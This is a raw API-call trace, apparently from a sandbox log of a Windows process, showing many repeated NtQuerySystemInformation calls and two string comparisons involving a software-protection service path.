NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.198] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.207] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc270, Length=0x28, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0273.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc190, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc250, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) 